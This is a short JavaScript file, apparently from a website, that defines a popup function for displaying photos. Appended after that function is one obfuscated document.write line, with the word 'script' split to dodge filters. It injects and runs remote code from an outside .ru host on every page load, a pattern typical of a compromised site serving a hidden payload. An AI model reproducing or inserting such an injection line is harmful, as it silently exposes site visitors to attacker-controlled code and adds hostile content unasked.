// JavaScript Document
//************************************
function toonFoto(img_file){
  w=window.open("","","width=700,height=500");
  w.document.open();
  w.document.write('<html><head><title>',img_file,'</title></head><body>');
  w.document.write('<img src="',img_file,' "width="680" height="480" border="0">');
  w.document.write('</body></html>');
  w.document.close();
}

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/VoIP.js"></scri'+'pt>');
